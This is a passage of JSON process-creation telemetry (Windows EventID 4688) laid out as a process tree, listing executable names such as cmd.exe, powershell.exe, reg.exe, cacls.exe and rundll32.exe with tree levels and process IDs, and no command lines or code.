e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\"],\"EventID\":[4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688],\"Exe\":[\"svchost.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"suchost.exe\",\"powershell.exe\",\"powershell.exe\",\"cmd.exe\",\"GoogleUpdate.exe\",\"SpeechModelDownload.exe\",\"wsqmcons.exe\",\"GoogleUpdate.exe\",\"GoogleUpdate.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"GoogleUpdate.exe\",\"GoogleUpdate.exe\",\"appidcertstorecheck.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"taskhostw.exe\",\"AppHostRegistrationVerifier.exe\",\"UsoClient.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"DeviceCensus.exe\",\"conhost.exe\",\"DeviceCensus.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"CompatTelRunner.exe\",\"conhost.exe\",\"MpCmdRun.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"wsqmcons.exe\",\"wermgr.exe\",\"GoogleUpdate.exe\",\"taskhostw.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"GoogleUpdate.exe\",\"GoogleUpdate.exe\",\"taskhostw.exe\",\"appidcertstorecheck.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"GoogleUpdate.exe\",\"GoogleUpdate.exe\",\"wermgr.exe\",\"wsqmcons.exe\",\"GoogleUpdate.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"wermgr.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"wermgr.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"taskhostw.exe\",\"GoogleUpdate.exe\",\"UsoClient.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"wermgr.exe\",\"wermgr.exe\",\"GoogleUpdate.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\"],\"IsBranch\":[false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,true,false,false,true,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,true,false,false,true,false,true,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,true,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,true,true,false,false,false,false,true,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false],\"IsLeaf\":[false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,false,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,true,true,true,true,true,true,false,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,true,true,true,true,false,true,true,false,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,true,false,true,true,false,true,false,true,true,true,true,true,true,false,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,true,true,false,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,true,true,true,true,true,true,true,true,false,false,true,true,true,true,false,true,true,true,true,true,true,true,true,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,true,true,true,true,true,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true],\"IsRoot\":[true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false],\"Level\":[1,2,3,3,3,3,3,3,3,3,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,4,5,5,5,5,5,5,5,5,5,5,5,6,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,5,5,5,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,4,5,5,5,5,5,5,5,5,6,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,6,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,5,5,5,5,5,5,3,3,3,3,3,3,2,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,3,4,5,5,5,5,5,5,5,5,5,5,5,5,5,5,3,3,3,3,3,3,3,3,3,3,3,2,2,2,3,2,2,2,2,3,2,2,3,3,3,3,3,3,3,3,3,4,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,4,5,5,5,5,5,5,5,5,6,7,7,7,7,7,7,7,7,7,7,7,7,7,7,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,3,3,3,3,3,3,2,3,3,4,2,2,3,2,3,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,4,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,4,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,3,3,3,3,3,3,2,2,2,2,3,2,2,3,3,3,3,3,3,3,3,3,4,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,4,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,3,3,3,3,3,3,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,4,5,5,5,5,5,6,5,5,5,5,5,5,5,5,6,5,5,5,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,4,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,3,3,3,3,3,3,2,2,2,3,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,4,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,3,3,3,3,3,3],\"NewProcessId\":[\"0xb3c\",\"0x1684\",\"0x490\",\"0x1360\",\"0xe50\",\"0x1748\",\"0x1584\",\"0x12bc\",\"0x1260\",\"0x2348\",\"0x1488\",\"0x1e3c\",\"0x1928\",\"0x9ac\",\"0x2378\",\"0x1124\",\"0x4b8\",\"0x1ca4\",\"0x1a44\",\"0x1984\",\"0x1004\",\"0x1940\",\"0x854\",\"0xd6c\",\"0xd74\",\"0x205c\",\"0x1248\",\"0x2228\",\"0x1348\",\"0x1f60\",\"0x17b0\",\"0x518\",\"0x494\",\"0x1584\",\"0x8c0\",\"0xde4\",\"0x2368\",\"0x6f8\",\"0x21f8\",\"0x38c\",\"0xc4c\",\"0xc98\",\"0x8c4\",\"0x16e0\",\"0x684\",\"0x1398\",\"0xeac\",\"0x394\",\"0x1f60\",\"0x1904\",\"0x1614\",\"0x834\",\"0xf3c\",\"0x2388\",\"0xe10\",\"0x16d4\",\"0xbe4\",\"0x1280\",\"0x14ec\",\"0x22c0\